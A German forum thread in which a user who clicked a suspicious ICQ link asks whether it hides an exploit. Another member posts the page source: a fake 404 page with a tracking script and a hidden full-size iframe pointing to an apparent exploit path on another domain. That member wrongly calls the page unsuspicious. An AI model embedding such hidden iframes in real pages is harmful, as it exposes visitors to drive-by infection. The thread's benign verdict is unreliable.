Exploit?

O

ozeo

0
Ebend hat mich jemand in icq geaddet und mir ein link geschickt, und ich depp hab geklickt...

h**p://networklab.info/blog/user=02738972

--- edit von lightsaver ---

DIESER LINK BEINHALTET HÖCHSTWAHRSCHEINLICH SCHADCODE, ANKLICKEN ALSO NUR AUF EINEM TESTRECHNER ODER ÄHNLICHEM!

--- /edit ---

Es erscheint (meiner Meinung nach) ne gefakte 404 Seite, und im Quelltext ist ein script!
Kann sich das mal jemand anschauen, und sagen, was das is?
Bevör ich jetzt alle PW´s ändere
 
ich sitze grad nicht an einem testrechner, kann den link also nicht mal überprüfen. mein firefox warnt mich auf jeden fall vor der seite.
wenn du glück hast, wurden nur deine passwörter geklaut, wenn du pech hast, wurde auch ein trojaner oder ähnliches installiert
 
Hallo,
hier die Seite:
Code: 
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- CNStats begin --><script type="text/javascript">
cnsd=document;cnst=escape(cnsd.title);
cnst=cnst.replace(/\+/g,'%2B');cnsa=navigator.appName;
cnsn=(cnsa.substring(0,2)=='Mi')?0:1;cnss=screen;cnspx=(cnsn==0)?cnss.colorDepth:cnss.pixelDepth;
document.write('<img src="http://networklab.info/cnstats/cnt-combined.php?i=45334&e='+cnss.width+'.'+cnss.height+'&d='+cnspx+'&r='+escape(cnsd.referrer)+'&p='+escape(cnsd.location)+'&t='+cnst+'" width="1" height="1" border="0">');
</script><noscript><img src="http://networklab.info/cnstats/cnt-combined.php?i=45334" width="1" height="1" border="0" alt="" /></noscript><!-- CNStats end --><HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<h1>Not Found</h1>
<p>The requested URL /blog/user=02738972 was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.0 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b Server at networklab.info Port 80</address>

<iframe src='http://germanyforum.info/spl1/' width='100%' height='100%' style='visibility: hidden;'></iframe>
</BODY>
</HTML>

Scheint unverdächtig zu sein, bzw. ein DDoS Angriff gegen germanforum.info.
Wenn man die Seite aufruft, bekommt man 'fuck you bech'.
 
Ich dachte immer, dass die Webtechniken alle so gesichert sein, dass ein unkontrollierter Zugriff auf die Festplatte unmöglich wäre. Was kann denn nun im schlimmsten Falle mit einer Webseite angestellt werden?
 
Exploits können auf websiten sein, die verschiedenste Sicherheitslücken ausnutzten, um Trojaner oder PassStealer zu installieren...
 
Hallo,
Original von :::Lük:::
Ich dachte immer, dass die Webtechniken alle so gesichert sein, dass ein unkontrollierter Zugriff auf die Festplatte unmöglich wäre. Was kann denn nun im schlimmsten Falle mit einer Webseite angestellt werden?
Zum Vergrößern anklicken....
Ziel ist es schon, aber die Realität sieht anders aus:
Drive-by-Download (evt. mal die heise.de Artikel unter Quellen angucken)
 
Um antworten zu können musst du eingeloggt sein.
Zurück
Oben